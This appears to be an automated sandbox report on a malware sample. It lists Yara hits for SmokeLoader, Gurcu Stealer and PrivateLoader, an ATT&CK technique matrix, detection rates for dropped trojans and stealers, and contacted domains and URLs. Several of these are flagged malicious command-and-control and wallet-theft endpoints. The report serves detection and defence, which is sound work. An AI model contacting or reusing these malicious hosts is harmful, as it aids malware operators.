Source: Yara match	File source: 0000002B.00000002.2426218610.0000027D9CC00000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY

Yara detected SmokeLoader

Source: Yara match	File source: 10.2.5zQ4dC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 10.0.5zQ4dC4.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0000000A.00000002.1747098618.0000000000160000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000A.00000002.1747475725.00000000005E1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe, type: DROPPED

Yara detected Gurcu Stealer

Source: Yara match	File source: 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: 8F82.exe PID: 3128, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: 8F82.exe PID: 3548, type: MEMORYSTR

Yara detected PrivateLoader

Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.AppLaunch.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.1031000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.4ZZ099qJ.exe.e80000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact	Resource Development	Reconnaissance
Valid Accounts	331 Windows Management Instrumentation	1 DLL Side-Loading	1 DLL Side-Loading	41 Disable or Modify Tools	1 OS Credential Dumping	2 System Time Discovery	Remote Services	11 Archive Collected Data	Exfiltration Over Other Network Medium	1 Web Service	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	1 System Shutdown/Reboot	Acquire Infrastructure	Gather Victim Identity Information
Default Accounts	2 Native API	11 Scheduled Task/Job	2 Bypass User Account Control	1 Deobfuscate/Decode Files or Information	1 Credentials in Registry	3 File and Directory Discovery	Remote Desktop Protocol	3 Data from Local System	Exfiltration Over Bluetooth	13 Ingress Tool Transfer	SIM Card Swap	Obtain Device Cloud Backups	Network Denial of Service	Domains	Credentials
Domain Accounts	1 Exploitation for Client Execution	2 Registry Run Keys / Startup Folder	1 Access Token Manipulation	4 Obfuscated Files or Information	Security Account Manager	159 System Information Discovery	SMB/Windows Admin Shares	1 Screen Capture	Automated Exfiltration	21 Encrypted Channel			Data Encrypted for Impact	DNS Server	Email Addresses
Local Accounts	13 Command and Scripting Interpreter	Login Hook	812 Process Injection	12 Software Packing	NTDS	1 Query Registry	Distributed Component Object Model	1 Email Collection	Traffic Duplication	11 Non-Standard Port			Data Destruction	Virtual Private Server	Employee Names
Cloud Accounts	11 Scheduled Task/Job	Network Logon Script	11 Scheduled Task/Job	1 Timestomp	LSA Secrets	771 Security Software Discovery	SSH	1 Clipboard Data	Scheduled Transfer	1 Multi-hop Proxy			Data Encrypted for Impact	Server	Gather Victim Network Information
Replication Through Removable Media	Scheduled Task	RC Scripts	2 Registry Run Keys / Startup Folder	1 DLL Side-Loading	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Data Transfer Size Limits	4 Non-Application Layer Protocol			Service Stop	Botnet	Domain Properties
External Remote Services	Systemd Timers	Startup Items	Startup Items	2 Bypass User Account Control	DCSync	351 Virtualization/Sandbox Evasion	Windows Remote Management	Web Portal Capture	Exfiltration Over C2 Channel	125 Application Layer Protocol			Inhibit System Recovery	Web Services	DNS
Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	11 Masquerading	Proc Filesystem	1 Application Window Discovery	Cloud Services	Credential API Hooking	Exfiltration Over Alternative Protocol	2 Proxy			Defacement	Serverless	Network Trust Dependencies
Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	351 Virtualization/Sandbox Evasion	/etc/passwd and /etc/shadow	1 Remote System Discovery	Direct Cloud VM Connections	Data Staged	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Web Protocols			Internal Defacement	Malvertising	Network Topology
Supply Chain Compromise	PowerShell	Cron	Cron	1 Access Token Manipulation	Network Sniffing	11 System Network Configuration Discovery	Shared Webroot	Local Data Staging	Exfiltration Over Asymmetric Encrypted Non-C2 Protocol	File Transfer Protocols			External Defacement	Compromise Infrastructure	IP Addresses
Compromise Software Dependencies and Development Tools	AppleScript	Launchd	Launchd	812 Process Injection	Input Capture	System Network Connections Discovery	Software Deployment Tools	Remote Data Staging	Exfiltration Over Unencrypted Non-C2 Protocol	Mail Protocols			Firmware Corruption	Domains	Network Security Appliances
Compromise Software Supply Chain	Windows Command Shell	Scheduled Task	Scheduled Task	1 Rundll32	Keylogging	Process Discovery	Taint Shared Content	Screen Capture	Exfiltration Over Physical Medium	DNS			Resource Hijacking	DNS Server	Gather Victim Org Information

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label	Link
jtfCFDmLdX.exe	58%	ReversingLabs	Win32.Trojan.RecordBreaker
jtfCFDmLdX.exe	72%	Virustotal		Browse
jtfCFDmLdX.exe	100%	Avira	TR/Crypt.XPACK.Gen
jtfCFDmLdX.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label	Link
C:\Users\user\AppData\Local\932079.exe	100%	Avira	TR/Spy.Agent.gygru
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	100%	Avira	HEUR/AGEN.1323769
C:\Users\user\AppData\Local\Temp\39D.exe	100%	Avira	HEUR/AGEN.1357339
C:\Users\user\AppData\Local\Temp\8427.exe	100%	Avira	HEUR/AGEN.1307175
C:\Users\user\AppData\Local\Temp\8F82.exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\7FE0.exe	100%	Avira	HEUR/AGEN.1307453
C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	100%	Avira	TR/Crypt.XPACK.Gen
C:\Users\user\AppData\Local\Temp\616D.exe	100%	Avira	HEUR/AGEN.1317414
C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	100%	Avira	HEUR/AGEN.1303617
C:\Users\user\AppData\Local\932079.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\9AED.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\39D.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\D9EC.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8427.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\8F82.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\GtxAoNQLNDxAZTy.data	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\7FE0.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\616D.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\932079.exe	87%	ReversingLabs	ByteCode-MSIL.Trojan.FormBook
C:\Users\user\AppData\Local\932079.exe	79%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	67%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\31839b57a4f11171d6abc8bbc4451ee4.exe	69%	Virustotal		Browse
C:\Users\user\AppData\Local\Temp\39D.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\616D.exe	92%	ReversingLabs	Win32.Trojan.RedLine
C:\Users\user\AppData\Local\Temp\61F6.exe	67%	ReversingLabs	Win64.Trojan.LummaStealer
C:\Users\user\AppData\Local\Temp\7FE0.exe	92%	ReversingLabs	ByteCode-MSIL.Trojan.Whispergate
C:\Users\user\AppData\Local\Temp\8427.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.SilkStealer
C:\Users\user\AppData\Local\Temp\853C.exe	13%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\8F82.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\Temp\9AED.exe	54%	ReversingLabs	Win32.Spyware.RedLine
C:\Users\user\AppData\Local\Temp\C4AD.exe	33%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\D9EC.exe	21%	ReversingLabs	Win32.Trojan.Generic
C:\Users\user\AppData\Local\Temp\IXP000.TMP\6rR8iy1.exe	75%	ReversingLabs	Win32.Trojan.Zusy
C:\Users\user\AppData\Local\Temp\IXP000.TMP\TE0FN83.exe	51%	ReversingLabs	Win32.Trojan.RecordBreaker
C:\Users\user\AppData\Local\Temp\IXP001.TMP\5zQ4dC4.exe	88%	ReversingLabs	Win32.Trojan.SmokeLoader
C:\Users\user\AppData\Local\Temp\IXP001.TMP\Tg9kb35.exe	32%	ReversingLabs	Win32.Trojan.RecordBreaker
C:\Users\user\AppData\Local\Temp\IXP002.TMP\2zx1310.exe	32%	ReversingLabs	Win32.Trojan.RecordBreaker
C:\Users\user\AppData\Local\Temp\IXP002.TMP\4ZZ099qJ.exe	35%	ReversingLabs	Win32.Trojan.RecordBreaker
C:\Users\user\AppData\Local\Temp\InstallSetup5.exe	39%	ReversingLabs	Win32.Trojan.Nemesis
C:\Users\user\AppData\Local\Temp\System.Data.SQLite.EF6.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.Data.SQLite.Linq.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\System.Data.SQLite.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\latestX.exe	71%	ReversingLabs	Win64.Trojan.Amadey
C:\Users\user\AppData\Local\Temp\toolspub2.exe	42%	ReversingLabs	Win32.Trojan.BotX
C:\Users\user\AppData\Local\Temp\x64\SQLite.Interop.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\x86\SQLite.Interop.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\WindowsSecurity\8F82.exe	83%	ReversingLabs	ByteCode-MSIL.Trojan.Smokeloader
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libcrypto-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent-2-1-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_core-2-1-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libevent_extra-2-1-7.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libgcc_s_sjlj-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libssl-1_1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libssp-0.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\libwinpthread-1.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-gencert.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\tor-real.exe	0%	ReversingLabs
C:\Users\user\AppData\Local\ixas4a6gsv\tor\zlib1.dll	0%	ReversingLabs
C:\Users\user\AppData\Roaming\Chrome Updater\Chrome.exe	61%	ReversingLabs	ByteCode-MSIL.Trojan.SilkStealer
C:\Users\user\AppData\Roaming\ReferencedAssembly\IdentityReference.exe	21%	ReversingLabs	Win32.Trojan.Generic

Unpacked PE Files

⊘No Antivirus matches

Domains

Source	Detection	Scanner	Link
ipwho.is	0%	Virustotal	Browse
objects.githubusercontent.com	1%	Virustotal	Browse
trecube.com	2%	Virustotal	Browse
central-cee-doja.ru	20%	Virustotal	Browse

URLs

Source	Detection	Scanner	Label	Link
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	0%	URL Reputation	safe
https://api.ip.sb/ip	0%	URL Reputation	safe
https://outlook.com_	0%	URL Reputation	safe
http://ocsp.sectigo.com0	0%	URL Reputation	safe
http://schemas.micro	0%	URL Reputation	safe
http://tempuri.org/	0%	Avira URL Cloud	safe
http://tempuri.org/Contract/MSValue2Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id23ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id12Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	0%	Avira URL Cloud	safe
http://35.166.49.216:8080	0%	Avira URL Cloud	safe
http://107.161.20.142:8080	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id2Response	2%	Virustotal		Browse
http://tempuri.org/Contract/MSValue2Response	2%	Virustotal		Browse
http://35.166.49.216:8080	0%	Virustotal		Browse
http://tempuri.org/Entity/Id12Response	2%	Virustotal		Browse
http://tempuri.org/	1%	Virustotal		Browse
http://tempuri.org/Entity/Id21Response	4%	Virustotal		Browse
http://tempuri.org/Entity/Id21Response	0%	Avira URL Cloud	safe
http://66.42.56.128:80	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id23ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id6ResponseD	0%	Avira URL Cloud	safe
http://18.218.18.183:80	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id13ResponseD	0%	Avira URL Cloud	safe
https://18.179.137.198:443	0%	Avira URL Cloud	safe
https://central-cee-doja.ru/getwallet.php?id=1444&wallet=ltc	100%	Avira URL Cloud	malware
https://64.227.21.98:443	0%	Avira URL Cloud	safe
http://107.161.20.142:8080	1%	Virustotal		Browse
http://tempuri.org/Entity/Id13ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id6ResponseD	1%	Virustotal		Browse
http://18.218.18.183:80	1%	Virustotal		Browse
http://66.42.56.128:80	7%	Virustotal		Browse
https://trecube.com/getext?id=1	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id1ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	0%	Avira URL Cloud	safe
https://64.227.21.98:443	0%	Virustotal		Browse
http://52.86.18.77:8080	100%	Avira URL Cloud	malware
http://216.39.242.18:8080	0%	Avira URL Cloud	safe
https://18.179.137.198:443	0%	Virustotal		Browse
http://tempuri.org/Entity/Id1ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id21ResponseD	0%	Avira URL Cloud	safe
https://trecube.com/getext?id=1	1%	Virustotal		Browse
https://central-cee-doja.ru/getwallet.php?id=1444&wallet=eth	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id10ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	0%	Avira URL Cloud	safe
http://216.39.242.18:8080	0%	Virustotal		Browse
http://52.86.18.77:8080	7%	Virustotal		Browse
http://tempuri.org/Entity/Id15Response	2%	Virustotal		Browse
http://tempuri.org/Contract/MSValue2ResponseD	0%	Avira URL Cloud	safe
http://45.55.65.93:80	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id5Response	2%	Virustotal		Browse
http://tempuri.org/Entity/Id21ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id15ResponseD	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id10Response	0%	Avira URL Cloud	safe
http://tempuri.org/Entity/Id24Response	2%	Virustotal		Browse
https://central-cee-doja.ru//ready.php?id=4627883	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id8Response	0%	Avira URL Cloud	safe
http://45.55.65.93:80	3%	Virustotal		Browse
http://185.217.98.121:80	100%	Avira URL Cloud	malware
http://tempuri.org/Entity/Id10ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id15ResponseD	1%	Virustotal		Browse
http://tempuri.org/Entity/Id10Response	2%	Virustotal		Browse
https://central-cee-doja.ru/getwallet.php?id=1444&wallet=dash	100%	Avira URL Cloud	malware
https://44.228.161.50:443	0%	Avira URL Cloud	safe
http://tempuri.org/Contract/MSValue2ResponseD	2%	Virustotal		Browse
http://tempuri.org/Entity/Id8Response	2%	Virustotal		Browse
https://44.228.161.50:443	0%	Virustotal		Browse
https://central-cee-doja.ru//ready.php?id=4627883	17%	Virustotal		Browse
http://185.217.98.121:80	11%	Virustotal		Browse

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Antivirus Detection	Reputation
ipwho.is	147.135.36.89	true	false	0%, Virustotal, Browse	unknown
ipinfo.io	34.117.59.81	true	false		high
github.com	20.29.134.23	true	false		high
t.me	149.154.167.99	true	false		high
cdn.discordapp.com	162.159.135.233	true	false		high
ip-api.com	208.95.112.1	true	false		high
trecube.com	104.21.35.168	true	false	2%, Virustotal, Browse	unknown
api.telegram.org	149.154.167.220	true	false		high
objects.githubusercontent.com	185.199.108.133	true	false	1%, Virustotal, Browse	unknown
central-cee-doja.ru	104.21.89.193	true	false	20%, Virustotal, Browse	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://ip-api.com/line?fields=query,country	false		high
https://central-cee-doja.ru/getwallet.php?id=1444&wallet=ltc	false	Avira URL Cloud: malware	unknown
https://trecube.com/getext?id=1	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://t.me/cinoshibot	false		high
https://central-cee-doja.ru/getwallet.php?id=1444&wallet=eth	false	Avira URL Cloud: malware	unknown
https://central-cee-doja.ru//ready.php?id=4627883	false	17%, Virustotal, Browse Avira URL Cloud: malware	unknown
https://central-cee-doja.ru/getwallet.php?id=1444&wallet=dash	false	Avira URL Cloud: malware	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://docs.oasis-open.org/wss/2004/01/oasis-200401-wss-soap-message-security-1.0#Text	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2005/02/sc/sct	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aka.ms/odirmr	explorer.exe, 0000000B.00000000.1721922206.00000000079FB000.00000004.00000001.00020000.00000000.sdmp	false		high
https://duckduckgo.com/chrome_newtab	AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004161000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000040D4000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.000000000427B000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.00000000041EE000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000003.2560173451.0000000004047000.00000004.00000800.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/ws/2004/04/security/sc/dk	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
https://duckduckgo.com/ac/?q=	AppLaunch.exe, 00000005.00000002.1830858383.00000000081DB000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080A5000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008132000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008018000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069A7000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008034000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.00000000069DF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006AD3000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A75000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007FA6000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1826314997.0000000006A3D000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000824C000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000081BF000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000007F8B000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.000000000814E000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.00000000080C1000.00000004.00000800.00020000.00000000.sdmp, AppLaunch.exe, 00000005.00000002.1830858383.0000000008268000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000029C7000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002933000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028FD000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.0000000002969000.00000004.00000800.00020000.00000000.sdmp	false		high
https://2019.www.torproject.org/docs/faq.html.en#WarningsAboutSOCKSandDNSInformationLeaks.%s	tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	false		high
http://tempuri.org/Entity/Id23ResponseD	AppLaunch.exe, 00000005.00000002.1826314997.0000000006968000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000028A7000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id12Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000B.00000000.1724220007.00000000097D4000.00000004.00000001.00020000.00000000.sdmp	false		high
http://tempuri.org/Contract/MSValue2Response	9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://35.166.49.216:8080	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	0%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002531000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://tempuri.org/Entity/Id2Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	2%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://www.torproject.org/	tor-real.exe, 0000001D.00000000.2123708088.0000000000F76000.00000002.00000001.01000000.00000015.sdmp	false		high
http://107.161.20.142:8080	8F82.exe, 00000013.00000002.2006862081.0000019433F41000.00000004.00000800.00020000.00000000.sdmp, 8F82.exe, 0000001C.00000002.2066577791.00000135CB661000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
http://schemas.xmlsoap.org/ws/2005/02/sc/dk/p_sha1	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id21Response	AppLaunch.exe, 00000005.00000002.1826314997.0000000006421000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.00000000024E1000.00000004.00000800.00020000.00000000.sdmp	false	4%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://ipinfo.io/https://www.maxmind.com/en/locate-my-ip-address	4ZZ099qJ.exe, 00000006.00000002.1667191056.0000000001031000.00000004.00000001.01000000.0000000A.sdmp, AppLaunch.exe, 00000009.00000002.2013665902.0000000000400000.00000040.00000400.00020000.00000000.sdmp	false		high
http://schemas.xmlsoap.org/2005/02/trust/spnego#GSS_Wrap	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://docs.oasis-open.org/wss/oasis-wss-saml-token-profile-1.1#SAMLID	AppLaunch.exe, 00000005.00000002.1826314997.00000000064BA000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp, 9AED.exe, 00000018.00000002.2633753789.0000000002595000.00000004.00000800.00020000.00000000.sdmp	false		high
http://tempuri.org/Entity/Id6ResponseD	AppLaunch.exe, 00000005.00000002.1826314997.00000000068DB000.00000004.00000800.00020000.00000000.sdmp, 7FE0.exe, 00000011.00000002.2156209250.000000000257A000.00000004.00000800.00020000.00000000.sdmp	false	1%, Virustotal, Browse Avira URL Cloud: safe	unknown
https://simpleflying.com/how-do-you-become-an-air-traffic-controller/	explorer.exe, 0000000B.00000000.1721922206.0000000007900000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
